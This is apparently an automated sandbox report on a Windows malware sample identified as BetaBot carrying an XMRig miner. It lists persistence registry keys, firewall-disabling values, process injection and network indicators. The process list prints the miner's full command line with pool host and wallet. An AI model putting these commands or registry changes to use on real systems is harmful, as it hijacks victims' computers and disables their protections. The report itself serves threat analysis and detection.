Analysis Overview
SHA256
43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16
Threat Level: Known bad
The file 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16 was found to be: Known bad.
Malicious Activity Summary
BetaBot
Modifies firewall policy service
xmrig
suricata: ET MALWARE Win32/Neurevt.A/Betabot Check-in 4
Modifies WinLogon for persistence
XMRig Miner payload
Executes dropped EXE
Sets file execution options in registry
UPX packed file
Checks BIOS information in registry
Drops startup file
Adds Run key to start application
Maps connected drives based on registry
Checks whether UAC is enabled
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
Program crash
Modifies Internet Explorer Protected Mode Banner
Enumerates system info in registry
Suspicious use of WriteProcessMemory
Checks processor information in registry
Suspicious behavior: EnumeratesProcesses
Modifies Internet Explorer settings
Suspicious behavior: MapViewOfSection
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: RenamesItself
Modifies Internet Explorer Protected Mode
Suspicious use of SetWindowsHookEx
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-07-07 23:58
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-07-07 23:58
Reported
2022-07-08 01:31
Platform
win7-20220414-en
Max time kernel
154s
Max time network
184s
Command Line
Signatures
BetaBot
Modifies WinLogon for persistence
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "explorer.exe, C:\\Users\\Admin\\AppData\\Roaming\\e7c7efc\\colorcpl.exe" | C:\Windows\SysWOW64\msiexec.exe | N/A |
Modifies firewall policy service
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile | C:\Windows\SysWOW64\explorer.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\PublicProfile\EnableFirewall = "0" | C:\Windows\SysWOW64\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile | C:\Windows\SysWOW64\explorer.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0" | C:\Windows\SysWOW64\explorer.exe | N/A |
suricata: ET MALWARE Win32/Neurevt.A/Betabot Check-in 4
xmrig
XMRig Miner payload
Sets file execution options in registry
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\gsyocy933ke1m3.exe | C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\gsyocy933ke1m3.exe\DisableExceptionChainValidation | C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe | C:\Windows\SysWOW64\explorer.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe\Debugger = "ltjufqn.exe" | C:\Windows\SysWOW64\explorer.exe | N/A |
UPX packed file
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\SysWOW64\explorer.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\autoit.vbe | C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce | C:\Windows\SysWOW64\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\llass = "C:\\ProgramData\\windervt\\gsyocy933ke1m3.exe" | C:\Windows\SysWOW64\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | C:\Windows\SysWOW64\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Windows\CurrentVersion\Run\llass = "\"C:\\ProgramData\\windervt\\gsyocy933ke1m3.exe\"" | C:\Windows\SysWOW64\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Windows\CurrentVersion\Run\llass = "\"C:\\ProgramData\\windervt\\gsyocy933ke1m3.exe\"" | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key created | \Registry\User\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Windows\CurrentVersion\Run | C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Windows\CurrentVersion\Run\LPwNNTETTJ = "\"C:\\Users\\Admin\\AppData\\Local\\XICFNZ~1\\zcvhost.exe\"" | C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe | N/A |
Maps connected drives based on registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 940 set thread context of 1180 | N/A | C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe | C:\Windows\notepad.exe |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\SysWOW64\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\explorer.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\SysWOW64\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Windows\SysWOW64\explorer.exe | N/A |
Modifies Internet Explorer Protected Mode
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" | C:\Windows\SysWOW64\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\2500 = "3" | C:\Windows\SysWOW64\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2500 = "3" | C:\Windows\SysWOW64\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\2500 = "3" | C:\Windows\SysWOW64\explorer.exe | N/A |
Modifies Internet Explorer Protected Mode Banner
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\Main\NoProtectedModeBanner = "1" | C:\Windows\SysWOW64\explorer.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\explorer.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
Suspicious behavior: RenamesItself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe
"C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe"
C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe
"C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe"
C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe
"C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe"
C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe
"C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe"
C:\Windows\notepad.exe
"C:\Windows\notepad.exe" -o pool.monero.hashvault.pro:5555:80 -u 48g2oLrkRG5JtnYA1pUukrYHgsu6aBqGTVxzZx6av6wvhBtgTHrKquWXMY2BJNnxs3aqj3U5RMnoZ6HaZYRMUouU8ke7kC4 -p trainwreck -v 0 -t 2
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | pool.monero.hashvault.pro | udp |
| US | 8.8.8.8:53 | google.com | udp |
| NL | 142.250.179.142:80 | google.com | tcp |
| US | 8.8.8.8:53 | 145.127.208.144.in-addr.arpa | udp |
| US | 144.208.127.145:80 | 144.208.127.145 | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2022-07-07 23:58
Reported
2022-07-08 01:31
Platform
win10v2004-20220414-en
Max time kernel
152s
Max time network
157s
Command Line
Signatures
BetaBot
Modifies WinLogon for persistence
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "explorer.exe, C:\\Users\\Admin\\AppData\\Roaming\\62ff808b\\PresentationHost.exe" | C:\Windows\SysWOW64\msiexec.exe | N/A |
Modifies firewall policy service
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile | C:\Windows\SysWOW64\explorer.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0" | C:\Windows\SysWOW64\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile | C:\Windows\SysWOW64\explorer.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile\EnableFirewall = "0" | C:\Windows\SysWOW64\explorer.exe | N/A |
xmrig
XMRig Miner payload
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\windervt\3a9uw5a3e.exe | N/A |
Sets file execution options in registry
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\3a9uw5a3e.exe | C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\3a9uw5a3e.exe\DisableExceptionChainValidation | C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe | C:\Windows\SysWOW64\explorer.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe\Debugger = "oxkvwsibs.exe" | C:\Windows\SysWOW64\explorer.exe | N/A |
UPX packed file
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\SysWOW64\explorer.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\autoit.vbe | C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Key created | \Registry\User\S-1-5-21-3751123196-3323558407-1869646069-1000\Software\Microsoft\Windows\CurrentVersion\Run | C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\LPwNNTETTJ = "\"C:\\Users\\Admin\\AppData\\Local\\XICFNZ~1\\zcvhost.exe\"" | C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce | C:\Windows\SysWOW64\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\llass = "C:\\ProgramData\\windervt\\3a9uw5a3e.exe" | C:\Windows\SysWOW64\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | C:\Windows\SysWOW64\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\llass = "\"C:\\ProgramData\\windervt\\3a9uw5a3e.exe\"" | C:\Windows\SysWOW64\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\llass = "\"C:\\ProgramData\\windervt\\3a9uw5a3e.exe\"" | C:\Windows\SysWOW64\msiexec.exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe | N/A |
Maps connected drives based on registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3036 set thread context of 4424 | N/A | C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe | C:\Windows\notepad.exe |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\explorer.exe |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\SysWOW64\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\SysWOW64\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Windows\SysWOW64\explorer.exe | N/A |
Modifies Internet Explorer Protected Mode
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" | C:\Windows\SysWOW64\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\2500 = "3" | C:\Windows\SysWOW64\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2500 = "3" | C:\Windows\SysWOW64\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\2500 = "3" | C:\Windows\SysWOW64\explorer.exe | N/A |
Modifies Internet Explorer Protected Mode Banner
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\SOFTWARE\Microsoft\Internet Explorer\Main\NoProtectedModeBanner = "1" | C:\Windows\SysWOW64\explorer.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\explorer.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
Suspicious behavior: RenamesItself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe | N/A |
| N/A | N/A | C:\ProgramData\windervt\3a9uw5a3e.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe
"C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe"
C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe
"C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe"
C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe
"C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe"
C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe
"C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe"
C:\Windows\notepad.exe
"C:\Windows\notepad.exe" -o pool.monero.hashvault.pro:5555:80 -u 48g2oLrkRG5JtnYA1pUukrYHgsu6aBqGTVxzZx6av6wvhBtgTHrKquWXMY2BJNnxs3aqj3U5RMnoZ6HaZYRMUouU8ke7kC4 -p trainwreck -v 0 -t 2
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 2000 -ip 2000
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2000 -s 1168
C:\ProgramData\windervt\3a9uw5a3e.exe
/prstb
Network
| Country | Destination | Domain | Proto |
| US | 20.189.173.7:443 | N/A | tcp |
| US | 93.184.221.240:80 | N/A | tcp |
| N/A | 224.0.0.251:5353 | N/A | udp |
| US | 8.8.8.8:53 | pool.monero.hashvault.pro | udp |
| US | 8.8.8.8:53 | pool.monero.hashvault.pro | udp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | pool.monero.hashvault.pro | udp |
| US | 8.8.8.8:53 | pool.monero.hashvault.pro | udp |
| NL | 142.250.179.142:80 | google.com | tcp |
| US | 8.8.8.8:53 | pool.monero.hashvault.pro | udp |
| US | 8.8.8.8:53 | pool.monero.hashvault.pro | udp |
| US | 8.8.8.8:53 | pool.monero.hashvault.pro | udp |
| US | 8.8.8.8:53 | pool.monero.hashvault.pro | udp |
Files
C:\ProgramData\windervt\3a9uw5a3e.exe
| MD5 | 65c47159ad930504229825ef323aecf8 |
| SHA1 | 26974a01d0815a6f5cc63b34527a1a6a91ba2705 |
| SHA256 | 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16 |
| SHA512 | d2ccc975b97380f2c3d4fdc0d403f0b150b4e34eedc6b1e3f4d4d1ff773a6bb0d7dcb48cccfd83e8ac06ec2972006da9bc21481cadf02563dcc17cbe89888d77 |